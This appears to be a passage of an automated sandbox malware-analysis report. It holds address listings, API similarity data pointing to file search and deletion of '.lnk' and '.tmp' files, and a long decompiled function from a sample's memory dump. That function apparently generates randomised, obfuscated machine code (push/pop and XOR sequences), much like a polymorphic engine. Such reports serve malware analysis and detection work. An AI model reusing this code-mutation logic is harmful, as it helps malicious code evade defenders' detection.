                                0x0221121c
                                0x02211236
                                0x02211236
                                0x02211248
                                0x02211248
                                0x02211252
                                0x02211255
                                0x02211257
                                0x00000000
                                0x00000000
                                0x0221126b
                                0x02211270
                                0x02211273
                                0x02211275
                                0x0221127d
                                0x02211282
                                0x02211282
                                0x02211242
                                0x02211242
                                0x02211245
                                0x02211245
                                0x0221128f
                                0x02211294
                                0x00000000
                                0x02211294
                                0x0221121e
                                0x0221122c
                                0x02211232
                                0x02211234
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02211234
                                0x022111bf
                                0x00000000
                                0x02211170
                                0x00000000
                                0x02211170
                                0x02211163
                                0x00000000
                                0x02211163
                                0x02211161
                                0x00000000
                                0x02211101
                                0x02211101
                                0x02211108
                                0x0221110f
                                0x022114c8
                                0x022114cb
                                0x022114d8
                                0x022114d8

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcatlstrlen$FileFindSleeplstrcmpi$lstrcpy$CloseDeleteFirstNext
                                • String ID: .lnk$.lnk$.lnk$.tmp$C:\Windows\$d
                                • API String ID: 3707883041-2096895072
                                • Opcode ID: 41db9860e4aef59f57b7c604aff0257b269134250daadbe2a8675d1a69af56f4
                                • Instruction ID: 305f9e9e41d6cb1d879841fdcb360302619f91253011692c368a0fc466ddd760
                                • Opcode Fuzzy Hash: 41db9860e4aef59f57b7c604aff0257b269134250daadbe2a8675d1a69af56f4
                                • Instruction Fuzzy Hash: 22D19BB5A1020AABDF04CFA4DC85FAF77F5AF58305F148518F919AB289D334E960CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 95%
                                			E0220B614(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24, signed int _a28) {
                                				signed int _v8;
                                				signed int _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v24;
                                				signed int _v28;
                                				signed int _v32;
                                				signed int _v36;
                                				signed int _v40;
                                				signed int _v44;
                                				signed int _v48;
                                				signed int _v52;
                                				signed int _v56;
                                				signed int _v60;
                                				signed int _v64;
                                				signed int _v68;
                                				void* _t456;
                                				signed int _t457;
                                				signed int _t460;
                                				void* _t465;
                                				void* _t472;
                                				void* _t474;
                                				void* _t477;
                                				void* _t480;
                                				void* _t484;
                                				signed int _t485;
                                				signed int _t493;
                                				signed int _t507;
                                				signed int _t509;
                                				signed int _t514;
                                				void* _t522;
                                				signed int _t528;
                                				signed int _t530;
                                				signed int _t533;
                                				signed int _t536;
                                				signed int _t538;
                                				signed int _t540;
                                				signed int _t542;
                                				signed int _t546;
                                				signed int _t556;
                                				signed int _t558;
                                				signed int _t561;
                                				signed int _t574;
                                				signed int _t577;
                                				signed int _t581;
                                				signed int _t685;
                                				signed int _t687;
                                				signed int _t689;
                                				signed int _t691;
                                				signed int _t699;
                                				void* _t703;
                                				void* _t704;
                                				void* _t705;
                                
                                				_v12 = 0;
                                				_v8 = 0;
                                				_v28 = 0;
                                				_v32 = 0xffffffff;
                                				_v24 = 0;
                                				_v20 = 0xffffffff;
                                				if(_a4 == 1 || _a4 == 2) {
                                					_v36 = 2;
                                				} else {
                                					_v36 = 4;
                                				}
                                				_v16 = _v36;
                                				_t456 = E0220B3EF(_a12, 0x12345678, _a8 + _v8, _a12);
                                				_t704 = _t703 + 0xc;
                                				_v8 = _v8 + _t456;
                                				_t457 = E022044CB(_v8 + _t456);
                                				asm("cdq");
                                				_t568 = 0x64;
                                				if((_t457 & 0x0000ffff) % 0x64 <= 0xa || _a24 >= _a28 || _a4 == 4 || _a4 == 3) {
                                					L54:
                                					_t460 = E022044CB(_t568);
                                					asm("cdq");
                                					_t569 = 0x64;
                                					if((_t460 & 0x0000ffff) % 0x64 <= 0x32 || _a4 == 4 || _a24 >= _a28 || _a20 == 0 || _a12 == 0) {
                                						L70:
                                						_t465 = E0220B3EF(_t569, 0x12345678, _a8 + _v8, _a12);
                                						_t705 = _t704 + 0xc;
                                						_t571 = _v8 + _t465;
                                						_v8 = _v8 + _t465;
                                						__eflags = _a4;
                                						if(_a4 != 0) {
                                							__eflags = _a4 - 1;
                                							if(_a4 != 1) {
                                								__eflags = _a4 - 2;
                                								if(_a4 != 2) {
                                									__eflags = _a4 - 3;
                                									if(_a4 != 3) {
                                										__eflags = _a4 - 4;
                                										if(_a4 == 4) {
                                											_t474 = E0220A840(0x7c, _a16, _a8 + _v8, _a20);
                                											_t705 = _t705 + 0x10;
                                											_t581 = _v8 + _t474;
                                											__eflags = _t581;
                                											_v8 = _t581;
                                										}
                                									} else {
                                										__eflags = _v32 - 0xffffffff;
                                										if(_v32 == 0xffffffff) {
                                											_v68 = _a20;
                                										} else {
                                											_v68 = _v32;
                                										}
                                										asm("sbb ecx, ecx");
                                										_t477 = E0220A840(( ~(_v32 - 0xffffffff) & 0xffffffeb) + 0x7b, _a16, _a8 + _v8, _v68);
                                										_t705 = _t705 + 0x10;
                                										_v8 = _v8 + _t477;
                                									}
                                								} else {
                                									__eflags = _v32 - 0xffffffff;
                                									if(_v32 == 0xffffffff) {
                                										_v64 = _a20;
                                									} else {
                                										_v64 = _v32;
                                									}
                                									asm("sbb edx, edx");
                                									_t480 = E0220A840(( ~(_v32 - 0xffffffff) & 0xffffffef) + 0x79, _a16, _a8 + _v8, _v64);
                                									_t705 = _t705 + 0x10;
                                									_v8 = _v8 + _t480;
                                								}
                                							} else {
                                								__eflags = _v32 - 0xffffffff;
                                								if(_v32 == 0xffffffff) {
                                									_v56 = _a20;
                                								} else {
                                									_v56 = _v32;
                                								}
                                								__eflags = _v32 - 0xffffffff;
                                								if(_v32 == 0xffffffff) {
                                									_v60 = 0x7a;
                                								} else {
                                									_t485 = E022044CB(_t571);
                                									asm("cdq");
                                									__eflags = (_t485 & 0x0000ffff) % 0x64 - 0x32;
                                									_v60 = ((0 | (_t485 & 0x0000ffff) % 0x00000064 - 0x00000032 <= 0x00000000) - 0x00000001 & 0x00000003) + 0x62;
                                								}
                                								_t484 = E0220A840(_v60, _a16, _a8 + _v8, _v56);
                                								_t705 = _t705 + 0x10;
                                								_v8 = _v8 + _t484;
                                							}
                                							L129:
                                							_a12 = _a12 ^  *(0x2203f74 + _v32 * 8);
                                							__eflags = _a4 - 4;
                                							if(_a4 != 4) {
                                								_t472 = E0220B3EF(_a12, 0x12345678, _a8 + _v8, _a12);
                                								_t705 = _t705 + 0xc;
                                								_t577 = _v8 + _t472;
                                								__eflags = _t577;
                                								_v8 = _t577;
                                							}
                                							__eflags = _v20 - 0xffffffff;
                                							if(_v20 != 0xffffffff) {
                                								_t574 = _v8 + E0220A840(_v20, _a16, _a8 + _v8, _v24);
                                								__eflags = _t574;
                                								_v8 = _t574;
                                							}
                                							return _v8;
                                						}
                                						_t493 = E022044CB(_t571);
                                						asm("cdq");
                                						_v28 = (_t493 & 0x0000ffff) % 5;
                                						_v40 = _v28;
                                						__eflags = _v40 - 4;
                                						if(__eflags > 0) {
                                							L108:
                                							goto L129;
                                						}
                                						switch( *((intOrPtr*)(_v40 * 4 +  &M0220BF9E))) {
                                							case 0:
                                								__eflags = _v32 - 0xffffffff;
                                								if(_v32 == 0xffffffff) {
                                									 *(_a8 + _v8) = 0x68;
                                									_v8 = _v8 + 1;
                                									 *(_a8 + _v8) = _a20;
                                									_t500 = _v8 + 4;
                                									__eflags = _t500;
                                									_v8 = _t500;
                                								} else {
                                									_t224 = _v32 + "PQRSUVW"; // 0x5421cd4c
                                									 *(_a8 + _v8) =  *_t224;
                                									_v8 = _v8 + 1;
                                								}
                                								_t503 = E0220B3EF(_a16, 0x12345678, _a8 + _v8, _a12 ^  *(0x2203f74 + _a16 * 8));
                                								_t705 = _t705 + 0xc;
                                								_v8 = _v8 + _t503;
                                								_t247 = _a16 + "XYZ[]^_"; // 0x5b5a5958
                                								 *(_a8 + _v8) =  *_t247;
                                								_v8 = _v8 + 1;
                                								goto L108;
                                							case 1:
                                								__eax = _a12;
                                								__ecx = _a8;
                                								__ecx = _a8 + _v8;
                                								__edx = _a16;
                                								__eax = E0220B354(_a8 + _v8, __eflags, _a16, _a8 + _v8, _a12);
                                								__ecx = _v8;
                                								__ecx = _v8 + __eax;
                                								_v8 = __ecx;
                                								__edx = _a12;
                                								_a8 = _a8 + _v8;
                                								__eax = E0220B3EF(__ecx, 0x12345678, _a8 + _v8, _a12);
                                								__ecx = _v8;
                                								__ecx = _v8 + __eax;
                                								_v8 = __ecx;
                                								__eflags = _v32 - 0xffffffff;
                                								if(_v32 == 0xffffffff) {
                                									__eax = E022044CB(__ecx);
                                									__eax = __eax & 0x0000ffff;
                                									asm("cdq");
                                									__ecx = 5;
                                									_t273 = __eax % 5;
                                									__eax = __eax / 5;
                                									__edx = _t273;
                                									_v12 = _t273;
                                									__eflags = _v12;
                                									if(_v12 != 0) {
                                										__eflags = _v12 - 1;
                                										if(_v12 != 1) {
                                											__eflags = _v12 - 2;
                                											if(_v12 != 2) {
                                												__eflags = _v12 - 3;
                                												if(_v12 != 3) {
                                													__edx = _a20;
                                													_a8 = _a8 + _v8;
                                													__ecx = _a16;
                                													__eax = E0220A840(0x78, _a16, _a8 + _v8, _a20);
                                													__edx = _v8;
                                													__edx = _v8 + __eax;
                                													__eflags = __edx;
                                													_v8 = __edx;
                                												} else {
                                													__eax = _a20;
                                													_a8 = _a8 + _v8;
                                													__edx = _a16;
                                													__eax = E0220A840(0x7b, _a16, _a8 + _v8, _a20);
                                													__ecx = _v8;
                                													__ecx = _v8 + __eax;
                                													_v8 = __ecx;
                                												}
                                											} else {
                                												__edx = _a20;
                                												_a8 = _a8 + _v8;
                                												__ecx = _a16;
                                												__eax = E0220A840(0x7e, _a16, _a8 + _v8, _a20);
                                												_v8 = _v8 + __eax;
                                												_v8 = _v8 + __eax;
                                											}
                                										} else {
                                											_a20 = _a20 * 0xffffffff;
                                											_a8 = _a8 + _v8;
                                											__edx = _a16;
                                											__eax = E0220A840(0x79, _a16, _a8 + _v8, _a20 * 0xffffffff);
                                											__ecx = _v8;
                                											__ecx = _v8 + __eax;
                                											_v8 = __ecx;
                                										}
                                									} else {
                                										__edx = _a20;
                                										_a8 = _a8 + _v8;
                                										__ecx = _a16;
                                										__eax = E0220A840(0x7a, _a16, _a8 + _v8, _a20);
                                										_v8 = _v8 + __eax;
                                										_v8 = _v8 + __eax;
                                									}
                                								} else {
                                									__edx = _v32;
                                									_a8 = _a8 + _v8;
                                									__ecx = _a16;
                                									__eax = E022044CB(_a16);
                                									__eax = __eax & 0x0000ffff;
                                									asm("cdq");
                                									__ecx = 7;
                                									_t267 = __eax % 7;
                                									__eax = __eax / 7;
                                									__eax = E0220A840(_t267 + 0x61, 7, _a8 + _v8, _v32);
                                									_v8 = _v8 + __eax;
                                									_v8 = _v8 + __eax;
                                								}
                                								goto L108;
                                							case 2:
                                								__eflags = _v32 - 0xffffffff;
                                								if(_v32 == 0xffffffff) {
                                									__ecx = _a20;
                                									_v44 = _a20;
                                								} else {
                                									__eax = _v32;
                                									_v44 = _v32;
                                								}
                                								__edx = _v44;
                                								_a8 = _a8 + _v8;
                                								__ecx = _a16;
                                								_v32 = _v32 - 0xffffffff;
                                								__edx =  ~(_v32 - 0xffffffff);
                                								asm("sbb edx, edx");
                                								 ~(_v32 - 0xffffffff) & 0xffffffe6 = ( ~(_v32 - 0xffffffff) & 0xffffffe6) + 0x7d;
                                								__eax = E0220A840(( ~(_v32 - 0xffffffff) & 0xffffffe6) + 0x7d, _a16, _a8 + _v8, _v44);
                                								__ecx = _v8;
                                								__ecx = _v8 + __eax;
                                								_v8 = __ecx;
                                								goto L108;
                                							case 3:
                                								__eflags = _v32 - 0xffffffff;
                                								if(_v32 == 0xffffffff) {
                                									__eax = _a20;
                                									_v48 = _a20;
                                								} else {
                                									__edx = _v32;
                                									_v48 = _v32;
                                								}
                                								__eflags = _v32 - 0xffffffff;
                                								if(_v32 == 0xffffffff) {
                                									_v52 = 0x78;
                                								} else {
                                									__eax = E022044CB(__ecx);
                                									__eax = __eax & 0x0000ffff;
                                									asm("cdq");
                                									__ecx = 0x64;
                                									_t330 = __eax % 0x64;
                                									__eax = __eax / 0x64;
                                									__edx = _t330;
                                									__eax = 0;
                                									__eflags = _t330 - 0x32;
                                									0 | __eflags <= 0x00000000 = (__eflags <= 0) - 1;
                                									(__eflags <= 0x00000000) - 0x00000001 & 0x00000003 = ((__eflags <= 0x00000000) - 0x00000001 & 0x00000003) + 0x61;
                                									_v52 = ((__eflags <= 0x00000000) - 0x00000001 & 0x00000003) + 0x61;
                                								}
                                								__ecx = _v48;
                                								_a8 = _a8 + _v8;
                                								__eax = _a16;
                                								__ecx = _v52;
                                								__eax = E0220A840(_v52, _a16, _a8 + _v8, _v48);
                                								_v8 = _v8 + __eax;
                                								_v8 = _v8 + __eax;
                                								goto L108;
                                							case 4:
                                								__eflags = _v32 - 0xffffffff;
                                								if(__eflags == 0) {
                                									__eflags = _a20 - 0x80;
                                									if(_a20 <= 0x80) {
                                										__eax = E022044CB(__ecx);
                                										__eax = __eax & 0x0000ffff;
                                										__eax = __eax & 0x80000fff;
                                										__eflags = __eax;
                                										if(__eax < 0) {
                                											__eax = __eax - 1;
                                											__eax = __eax | 0xfffff000;
                                											__eax = __eax + 1;
                                											__eflags = __eax;
                                										}
                                										_v12 = __eax;
                                									} else {
                                										__eax = E022044CB(__ecx);
                                										__eax = __eax & 0x0000ffff;
                                										asm("cdq");
                                										__ecx = 0xfffe;
                                										_t357 = __eax % 0xfffe;
                                										__eax = __eax / 0xfffe;
                                										__edx = _t357;
                                										_v12 = _t357;
                                									}
                                									_a20 = _a20 ^ _v12;
                                									_a8 = _a8 + _v8;
                                									__ecx = _a16;
                                									__eax = E0220A840(0x78, _a16, _a8 + _v8, _a20 ^ _v12);
                                									_v8 = _v8 + __eax;
                                									_v8 = _v8 + __eax;
                                									__eax = _a12;
                                									__ecx = _a8;
                                									__ecx = _a8 + _v8;
                                									__eax = E0220B3EF(_a8 + _v8, 0x12345678, _a8 + _v8, _a12);
                                									_v8 = _v8 + __eax;
                                									_v8 = _v8 + __eax;
                                									__eax = _v12;
                                									_a8 = _a8 + _v8;
                                									__edx = _a16;
                                									__eax = E0220A840(0x7b, _a16, _a8 + _v8, _v12);
                                									__ecx = _v8;
                                									__ecx = _v8 + __eax;
                                									__eflags = __ecx;
                                									_v8 = __ecx;
                                								} else {
                                									__eax = _a28;
                                									_a24 = _a24 + 1;
                                									__edx = _v32;
                                									__eax = _a16;
                                									__ecx = _a12;
                                									_a8 = _a8 + _v8;
                                									__eax = _a4;
                                									__eax = E0220BFB2(__eflags, _a4, _a8 + _v8, _a12, _a16, _v32, _a24 + 1, _a28);
                                									__ecx = _v8;
                                									__ecx = _v8 + __eax;
                                									_v8 = __ecx;
                                								}
                                								goto L108;
                                						}
                                					} else {
                                						_v12 = 0;
                                						while(_v12 < 7) {
                                							_t569 = _v12;
                                							if((_a12 &  *(0x2203f74 + _v12 * 8)) == 0 || _v12 == _a16) {
                                								_t507 = _v12 + 1;
                                								__eflags = _t507;
                                								_v12 = _t507;
                                								continue;
                                							} else {
                                								_t509 = E022044CB(_t569);
                                								asm("cdq");
                                								_t606 = 7;
                                								_v32 = (_t509 & 0x0000ffff) % 7;
                                								L65:
                                								while(1) {
                                									if((_a12 &  *(0x2203f74 + _v32 * 8)) == 0) {
                                										L67:
                                										_t514 = E022044CB(_t606);
                                										asm("cdq");
                                										_t606 = 7;
                                										_v32 = (_t514 & 0x0000ffff) % 7;
                                										continue;
                                									}
                                									_t606 = _v32;
                                									if(_v32 != _a16) {
                                										_a12 = _a12 ^  *(0x2203f74 + _v32 * 8);
                                										_t522 = E0220B614(0, _a8 + _v8, _a12, _v32, _a20, _a24 + 1, _a28);
                                										_t704 = _t704 + 0x1c;
                                										_t569 = _v8 + _t522;
                                										_v8 = _v8 + _t522;
                                										goto L70;
                                									}
                                									goto L67;
                                								}
                                							}
                                						}
                                						goto L70;
                                					}
                                				} else {
                                					while(1) {
                                						_v20 = (E022044CB(_t568) & 0x0000ffff) % _v16;
                                						_t528 = E022044CB(_t568) & 0xfff;
                                						if(_t528 < 0) {
                                							_t528 = (_t528 - 0x00000001 | 0xfffff000) + 1;
                                						}
                                						_v24 = _t528 + 0xa;
                                						_t530 = E022044CB(_t568);
                                						asm("cdq");
                                						_t568 = 0x64;
                                						if((_t530 & 0x0000ffff) % 0x64 > 0x32) {
                                							_t556 = E022044CB(0x64) & 0x0000ffff;
                                							asm("cdq");
                                							_t568 = 0x64;
                                							_t716 = _t556 % 0x64 - 0x32;
                                							if(_t556 % 0x64 <= 0x32) {
                                								__eflags = _a20 - 3;
                                								if(_a20 > 3) {
                                									_t558 = E022044CB(0x64);
                                									_t568 = _a20 - 1;
                                									_t699 = (_t558 & 0x0000ffff) % (_a20 - 1) + 1;
                                									__eflags = _t699;
                                									_v24 = _t699;
                                								}
                                							} else {
                                								_t561 = E02204503(_t716);
                                								_t568 = 0xfffff;
                                								_v24 = _t561 % 0xfffff + 0x400;
                                							}
                                						}
                                						L15:
                                						if(_v20 != 0) {
                                							__eflags = _v20 - 1;
                                							if(_v20 != 1) {
                                								__eflags = _v20 - 2;
                                								if(_v20 != 2) {
                                									__eflags = _v20 - 3;
                                									if(_v20 != 3) {
                                										goto L54;
                                									}
                                									__eflags = _a20 - 4;
                                									if(_a20 >= 4) {
                                										_t533 = E022044CB(_t568);
                                										_t568 = _a20 - 3;
                                										_v24 = (_t533 & 0x0000ffff) % (_a20 - 3) + 2;
                                										_v12 = 0;
                                										while(1) {
                                											_t536 = _a20;
                                											__eflags = _t536 % _v24;
                                											if(_t536 % _v24 == 0) {
                                												break;
                                											}
                                											__eflags = _v12 - 0x100;
                                											if(_v12 == 0x100) {
                                												break;
                                											}
                                											_t542 = E022044CB(_t568);
                                											_t568 = _a20 - 3;
                                											_v24 = (_t542 & 0x0000ffff) % (_a20 - 3) + 2;
                                											_t685 = _v12 + 1;
                                											__eflags = _t685;
                                											_v12 = _t685;
                                										}
                                										_t538 = _a20;
                                										__eflags = _t538 % _v24;
                                										if(_t538 % _v24 == 0) {
                                											_t540 = _a20;
                                											__eflags = _t540 % _v24;
                                											_a20 = _t540 / _v24;
                                											_v20 = 0x99;
                                											goto L54;
                                										}
                                										while(1) {
                                											_v20 = (E022044CB(_t568) & 0x0000ffff) % _v16;
                                											_t528 = E022044CB(_t568) & 0xfff;
                                											if(_t528 < 0) {
                                												_t528 = (_t528 - 0x00000001 | 0xfffff000) + 1;
                                											}
                                											_v24 = _t528 + 0xa;
                                											_t530 = E022044CB(_t568);
                                											asm("cdq");
                                											_t568 = 0x64;
                                											if((_t530 & 0x0000ffff) % 0x64 > 0x32) {
                                												_t556 = E022044CB(0x64) & 0x0000ffff;
                                												asm("cdq");
                                												_t568 = 0x64;
                                												_t716 = _t556 % 0x64 - 0x32;
                                												if(_t556 % 0x64 <= 0x32) {
                                													__eflags = _a20 - 3;
                                													if(_a20 > 3) {
                                														_t558 = E022044CB(0x64);
                                														_t568 = _a20 - 1;
                                														_t699 = (_t558 & 0x0000ffff) % (_a20 - 1) + 1;
                                														__eflags = _t699;
                                														_v24 = _t699;
                                													}
                                												} else {
                                													_t561 = E02204503(_t716);
                                													_t568 = 0xfffff;
                                													_v24 = _t561 % 0xfffff + 0x400;
                                												}
                                											}
                                											goto L15;
                                										}
                                									}
                                									continue;
                                								}
                                								_t568 = _a20 ^ _v24;
                                								_a20 = _a20 ^ _v24;
                                								_v20 = 0x7b;
                                								goto L54;
                                							}
                                							__eflags = _a4 - 2;
                                							if(_a4 != 2) {
                                								__eflags = _a4 - 1;
                                								if(_a4 != 1) {
                                									_v20 = 0x79;
                                									_t546 = _a20 + _v24;
                                									__eflags = _t546;
                                									_a20 = _t546;
                                								} else {
                                									__eflags = _a20 - _v24;
                                									if(_a20 - _v24 > 0) {
                                										_v20 = 0x79;
                                										_t687 = _a20 + _v24;
                                										__eflags = _t687;
                                										_a20 = _t687;
                                									} else {
                                										_v20 = 0x7a;
                                										_t568 = _a20 - _v24;
                                										_a20 = _a20 - _v24;
                                									}
                                								}
                                							} else {
                                								__eflags = _a20 - _v24;
                                								if(_a20 - _v24 > 0) {
                                									_v20 = 0x79;
                                									_t689 = _a20 - _v24;
                                									__eflags = _t689;
                                									_a20 = _t689;
                                								} else {
                                									_v20 = 0x7a;
                                									_t568 = _a20 + _v24;
                                									_a20 = _a20 + _v24;
                                								}
                                							}
                                						} else {
                                							if(_a4 != 2) {
                                								__eflags = _a4 - 1;
                                								if(_a4 != 1) {
                                									_v20 = 0x7a;
                                									_t691 = _a20 - _v24;
                                									__eflags = _t691;
                                									_a20 = _t691;
                                								} else {
                                									__eflags = _a20 - _v24;
                                									if(_a20 - _v24 > 0) {
                                										_v20 = 0x7a;
                                										_t568 = _a20 - _v24;
                                										__eflags = _t568;
                                										_a20 = _t568;
                                									} else {
                                										_v20 = 0x79;
                                										_a20 = _a20 + _v24;
                                									}
                                								}
                                							} else {
                                								if(_a20 - _v24 > 0) {
                                									_v20 = 0x7a;
                                									_t568 = _a20 + _v24;
                                									__eflags = _t568;
                                									_a20 = _t568;
                                								} else {
                                									_v20 = 0x79;
                                									_a20 = _a20 - _v24;
                                								}
                                							}
                                						}
                                						goto L54;
                                					}
                                				}
                                			}
























































                                0x0220b61a
                                0x0220b621
                                0x0220b628
                                0x0220b62f
                                0x0220b636
                                0x0220b63d
                                0x0220b648
                                0x0220b659
                                0x0220b650
                                0x0220b650
                                0x0220b650
                                0x0220b663
                                0x0220b676
                                0x0220b67b
                                0x0220b683
                                0x0220b686
                                0x0220b690
                                0x0220b691
                                0x0220b69b
                                0x0220b90e
                                0x0220b90e
                                0x0220b918
                                0x0220b919
                                0x0220b923
                                0x0220ba1c
                                0x0220ba2c
                                0x0220ba31
                                0x0220ba37
                                0x0220ba39
                                0x0220ba3c
                                0x0220ba40
                                0x0220be04
                                0x0220be08
                                0x0220be79
                                0x0220be7d
                                0x0220bec5
                                0x0220bec9
                                0x0220bf11
                                0x0220bf15
                                0x0220bf28
                                0x0220bf2d
                                0x0220bf33
                                0x0220bf33
                                0x0220bf35
                                0x0220bf35
                                0x0220becb
                                0x0220becb
                                0x0220becf
                                0x0220bedc
                                0x0220bed1
                                0x0220bed4
                                0x0220bed4
                                0x0220bef6
                                0x0220beff
                                0x0220bf04
                                0x0220bf0c
                                0x0220bf0c
                                0x0220be7f
                                0x0220be7f
                                0x0220be83
                                0x0220be90
                                0x0220be85
                                0x0220be88
                                0x0220be88
                                0x0220beaa
                                0x0220beb3
                                0x0220beb8
                                0x0220bec0
                                0x0220bec0
                                0x0220be0a
                                0x0220be0a
                                0x0220be0e
                                0x0220be1b
                                0x0220be10
                                0x0220be13
                                0x0220be13
                                0x0220be1e
                                0x0220be22
                                0x0220be4a
                                0x0220be24
                                0x0220be24
                                0x0220be2e
                                0x0220be38
                                0x0220be45
                                0x0220be45
                                0x0220be64
                                0x0220be69
                                0x0220be71
                                0x0220be71
                                0x0220bf38
                                0x0220bf45
                                0x0220bf48
                                0x0220bf4c
                                0x0220bf5e
                                0x0220bf63
                                0x0220bf69
                                0x0220bf69
                                0x0220bf6b
                                0x0220bf6b
                                0x0220bf6e
                                0x0220bf72
                                0x0220bf92
                                0x0220bf92
                                0x0220bf94
                                0x0220bf94
                                0x0220bf9d
                                0x0220bf9d
                                0x0220ba46
                                0x0220ba50
                                0x0220ba58
                                0x0220ba5e
                                0x0220ba61
                                0x0220ba65
                                0x0220bdff
                                0x00000000
                                0x0220bdff
                                0x0220ba6e
                                0x00000000
                                0x0220ba75
                                0x0220ba79
                                0x0220ba9d
                                0x0220baa6
                                0x0220bab2
                                0x0220bab7
                                0x0220bab7
                                0x0220baba
                                0x0220ba7b
                                0x0220ba84
                                0x0220ba8a
                                0x0220ba92
                                0x0220ba92
                                0x0220bad7
                                0x0220badc
                                0x0220bae4
                                0x0220baf0
                                0x0220baf6
                                0x0220bafe
                                0x00000000
                                0x00000000
                                0x0220bb06
                                0x0220bb0a
                                0x0220bb0d
                                0x0220bb11
                                0x0220bb15
                                0x0220bb1d
                                0x0220bb20
                                0x0220bb22
                                0x0220bb25
                                0x0220bb2c
                                0x0220bb35
                                0x0220bb3d
                                0x0220bb40
                                0x0220bb42
                                0x0220bb45
                                0x0220bb49
                                0x0220bb85
                                0x0220bb8a
                                0x0220bb8f
                                0x0220bb90
                                0x0220bb95
                                0x0220bb95
                                0x0220bb95
                                0x0220bb97
                                0x0220bb9a
                                0x0220bb9e
                                0x0220bbc6
                                0x0220bbca
                                0x0220bbf2
                                0x0220bbf6
                                0x0220bc1b
                                0x0220bc1f
                                0x0220bc44
                                0x0220bc4b
                                0x0220bc4f
                                0x0220bc55
                                0x0220bc5d
                                0x0220bc60
                                0x0220bc60
                                0x0220bc62
                                0x0220bc21
                                0x0220bc21
                                0x0220bc28
                                0x0220bc2c
                                0x0220bc32
                                0x0220bc3a
                                0x0220bc3d
                                0x0220bc3f
                                0x0220bc3f
                                0x0220bbf8
                                0x0220bbf8
                                0x0220bbff
                                0x0220bc03
                                0x0220bc09
                                0x0220bc14
                                0x0220bc16
                                0x0220bc16
                                0x0220bbcc
                                0x0220bbcf
                                0x0220bbd6
                                0x0220bbda
                                0x0220bbe0
                                0x0220bbe8
                                0x0220bbeb
                                0x0220bbed
                                0x0220bbed
                                0x0220bba0
                                0x0220bba0
                                0x0220bba7
                                0x0220bbab
                                0x0220bbb1
                                0x0220bbbc
                                0x0220bbbe
                                0x0220bbbe
                                0x0220bb4b
                                0x0220bb4b
                                0x0220bb52
                                0x0220bb56
                                0x0220bb5a
                                0x0220bb5f
                                0x0220bb64
                                0x0220bb65
                                0x0220bb6a
                                0x0220bb6a
                                0x0220bb70
                                0x0220bb7b
                                0x0220bb7d
                                0x0220bb7d
                                0x00000000
                                0x00000000
                                0x0220bc6a
                                0x0220bc6e
                                0x0220bc78
                                0x0220bc7b
                                0x0220bc70
                                0x0220bc70
                                0x0220bc73
                                0x0220bc73
                                0x0220bc7e
                                0x0220bc85
                                0x0220bc89
                                0x0220bc90
                                0x0220bc93
                                0x0220bc95
                                0x0220bc9a
                                0x0220bc9e
                                0x0220bca6
                                0x0220bca9
                                0x0220bcab
                                0x00000000
                                0x00000000
                                0x0220bcb3
                                0x0220bcb7
                                0x0220bcc1
                                0x0220bcc4
                                0x0220bcb9
                                0x0220bcb9
                                0x0220bcbc
                                0x0220bcbc
                                0x0220bcc7
                                0x0220bccb
                                0x0220bcf3
                                0x0220bccd
                                0x0220bccd
                                0x0220bcd2
                                0x0220bcd7
                                0x0220bcd8
                                0x0220bcdd
                                0x0220bcdd
                                0x0220bcdd
                                0x0220bcdf
                                0x0220bce1
                                0x0220bce7
                                0x0220bceb
                                0x0220bcee
                                0x0220bcee
                                0x0220bcfa
                                0x0220bd01
                                0x0220bd05
                                0x0220bd09
                                0x0220bd0d
                                0x0220bd18
                                0x0220bd1a
                                0x00000000
                                0x00000000
                                0x0220bd22
                                0x0220bd26
                                0x0220bd5f
                                0x0220bd66
                                0x0220bd7f
                                0x0220bd84
                                0x0220bd89
                                0x0220bd89
                                0x0220bd8e
                                0x0220bd90
                                0x0220bd91
                                0x0220bd96
                                0x0220bd96
                                0x0220bd96
                                0x0220bd97
                                0x0220bd68
                                0x0220bd68
                                0x0220bd6d
                                0x0220bd72
                                0x0220bd73
                                0x0220bd78
                                0x0220bd78
                                0x0220bd78
                                0x0220bd7a
                                0x0220bd7a
                                0x0220bd9d
                                0x0220bda4
                                0x0220bda8
                                0x0220bdae
                                0x0220bdb9
                                0x0220bdbb
                                0x0220bdbe
                                0x0220bdc2
                                0x0220bdc5
                                0x0220bdce
                                0x0220bdd9
                                0x0220bddb
                                0x0220bdde
                                0x0220bde5
                                0x0220bde9
                                0x0220bdef
                                0x0220bdf7
                                0x0220bdfa
                                0x0220bdfa
                                0x0220bdfc
                                0x0220bd28
                                0x0220bd28
                                0x0220bd2f
                                0x0220bd33
                                0x0220bd37
                                0x0220bd3b
                                0x0220bd42
                                0x0220bd46
                                0x0220bd4a
                                0x0220bd52
                                0x0220bd55
                                0x0220bd57
                                0x0220bd57
                                0x00000000
                                0x00000000
                                0x0220b953
                                0x0220b953
                                0x0220b965
                                0x0220b96f
                                0x0220b97e
                                0x0220b95f
                                0x0220b95f
                                0x0220b962
                                0x00000000
                                0x0220b990
                                0x0220b990
                                0x0220b99a
                                0x0220b99b
                                0x0220b9a2
                                0x00000000
                                0x0220b9a5
                                0x0220b9b4
                                0x0220b9be
                                0x0220b9be
                                0x0220b9c8
                                0x0220b9c9
                                0x0220b9d0
                                0x00000000
                                0x0220b9d0
                                0x0220b9b6
                                0x0220b9bc
                                0x0220b9e2
                                0x0220ba05
                                0x0220ba0a
                                0x0220ba10
                                0x0220ba12
                                0x00000000
                                0x0220ba12
                                0x00000000
                                0x0220b9bc
                                0x0220b9a5
                                0x0220b97e
                                0x00000000
                                0x0220b965
                                0x00000000
                                0x0220b6c1
                                0x0220b6d0
                                0x0220b6dd
                                0x0220b6e2
